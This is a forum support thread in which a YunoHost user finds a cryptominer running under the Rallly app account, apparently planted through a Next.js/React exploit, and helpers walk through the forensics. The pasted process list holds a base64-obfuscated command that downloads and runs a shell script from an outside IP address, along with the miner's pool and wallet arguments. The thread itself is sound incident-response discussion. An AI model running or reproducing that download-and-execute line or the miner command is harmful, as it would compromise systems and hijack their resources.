After Rallly update to version 4.5.6 a miner is on my system. Version 4.5.13 fixed many security issues

ajoe04 · December 9, 2025, 1:22pm

What app is this about, and its version: Rallly 4.5.6~ynh1
What YunoHost version are you running: YunoHost 12.1.36
What type of hardware are you using: Old laptop or computer

Describe your issue

Rallly latest version. Now a miner is active, using 50% of the CPU. Maybe the miner was there before the Rallly update. Rallly was the latest update.

Share relevant logs or error messages

this is the output of “sudo ps aux | grep c3” on the machine:

rallly    250514  0.0  0.0   2588   944 ?        S    04:40   0:00 /bin/sh -c echo d2dldCAtTyAvdG1wL3Rlc3Quc2ggaHR0cDovLzMxLjU3LjQ2LjI4L3Rlc3Quc2gmJnNoIC90bXAvdGVzdC5zaA==|base64 -d|sh

rallly    250519  198 29.9 2441116 2403496 ?     SNl  04:40 1515:34 ./hash -o auto.c3pool.org:13333 -u 45vWwParN9pJSmRVEd57jH5my5N7Py6Lsi3GqTg3wm8XReVLEietnSLWUSXayo5LdAW2objP4ubjiWTM7vk4JiYm4j3Aozd -p miner_1765251666 --randomx-1gb-pages --cpu-priority=0 --cpu-max-threads-hint=80

Aleks · December 9, 2025, 2:47pm

Can you at least share the upgrade log and explain where the line you’re copypasting is coming from

clacos · December 9, 2025, 2:52pm

Could it be a React exploit with no direct link to Yunohost nor Rally ?

I see that Rally 4.5.8 have updated to React 19.1.2

Aleks · December 9, 2025, 6:22pm

I suppose we can try to dig where this “hash” thing is coming from and at what time it was created exactly …

We can find out what’s the current working directory of this process (assuming it’s still running using it’s PID 250519) :

readlink -e /proc/250519/cwd

and then you can ls -l followed by the corresponding directory which should give an idea of the content and the creation/modification date, in particular the program called “hash”

Aleks · December 9, 2025, 6:22pm

Also let’s try to have a better look at what exactly is running this “hash” program using something like ps -ef --forest | grep -C10 hash | grep rally

ajoe04 · December 9, 2025, 6:25pm

sudo readlink -e /proc/250519/cwd
/var/www/rallly/apps/web/.next/standalone/apps/web

sudo ls -l /var/www/rallly/apps/web/.next/standalone/apps/web
in total 10352
-rwxr-xr-x 1 rallly rallly 7047392 23. Nov 2023 hash
-rw-r–r-- 1 rallly rallly 3522081 9. Dez 01:46 kal.tar.gz
drwxr-xr-x 4 rallly rallly 4096 30. Nov 15:17 node_modules
-rw-r----- 1 rallly rallly 4284 30. Nov 15:17 package.json
drwxr-xr-x 3 rallly rallly 4096 30. Nov 15:17 public
-rw-r–r-- 1 rallly rallly 7220 30. Nov 15:17 server.js
drwxr-xr-x 2 rallly rallly 4096 23. Jun 02:46 xmrig-6.24.0

Update of Rallly - according to Yunohost Logs:
Start 30. November 2025 um 15:11:05
End 30. November 2025 um 15:17:26

ajoe04 · December 9, 2025, 6:26pm

sudo ps -ef --forest | grep -C10 hash | grep rally
normal-user    358230  357481  0 19:25 pts/0    00:00:00              \_ grep rally

Aleks · December 9, 2025, 7:20pm

Not sure how you ended up finding this btw but this bit is “obfuscated” base64 that download some scripts from a chinese server and runs it … thanksfully that’s “only” as the rallly user and not as root …

If you want we can dig further since the code is supposedly downloaded into /tmp/test.sh, we can cat /tmp/test.sh to display the content and learn a bit about what it does - though i would assume that’s what did set up the crypto miner

Anyway, back to the “hash” program in /var/www/rally : we see that the modification date is Nov 2023, but considering that the upgrade completely replaces the /var/www/rallly folder, I would assume that it was put there after the upgrade itself (or maybe there’s a cron job or something somewhere that re-setup the cryptominer)

Also considering it ended up in the .next folder, it points to being related to the React / Next.JS exploit as mentioned by @clacos earlier

A quick search of Google with kal.tar.gz (which is listed in the ls -l) seems to confirm it. For example in this discussion : https://old.reddit.com/r/nextjs/comments/1pe2ep4/the_vulnerability_is_not_a_joke_you_should/nsnn03c/

Not sure how to properly deal with this exactly, I would say at least uninstall rallly (which should also delete the user, which the virus only has access to supposedly), and then we should do some extensive check for anything suspsicious

Aleks · December 9, 2025, 7:21pm

It would also be interesting to know how you found out about the issue in the first place ? Was it because of high CPU usage slowing down the rest of the system ? Like you did a top / htop and ended up seeing this program ?

ajoe04 · December 9, 2025, 9:45pm

Yes, I found it because the App “NetData” showed a high CPU usage on the server of constant 50% (2 of 4 cores), which I confirmed with htop and top. There I saw the miner application.

ajoe04 · December 9, 2025, 9:46pm

The cat /tmp/test.sh shows a “file not found” error.

ajoe04 · December 9, 2025, 10:05pm

1.) I killed the hash process with kill -9 250519 and saw directly maybe 10 new processes with the name xmrig-6.24.0
2.) I made an upgrade from version 4.5.6 to version 4.5.8 of rallly - available now.
3.) the output of the “web” folder now is missing the xmrig-6.24.0 binary.

sudo ls -l /var/www/rallly/apps/web/.next/standalone/apps/web
in total 24
drwxr-xr-x   4 rallly rallly 4096  9. Dez 22:55 node_modules
\-rw-r-----  1 rallly rallly 4438  9. Dez 22:55 package.json
drwxr-xr-x   3 rallly rallly 4096  9. Dez 22:55 public
\-rw-r--r--  1 rallly rallly 7271  9. Dez 22:56 server.js

4.) now the CPU usage is back to normal. Hopefully that problem is solved.

ajoe04 · December 12, 2025, 5:49pm

Version 4.5.13 fixes additional security issues in React - released 21.12.2025.

system · December 27, 2025, 5:49pm

This topic was automatically closed 15 days after the last reply. New replies are no longer allowed.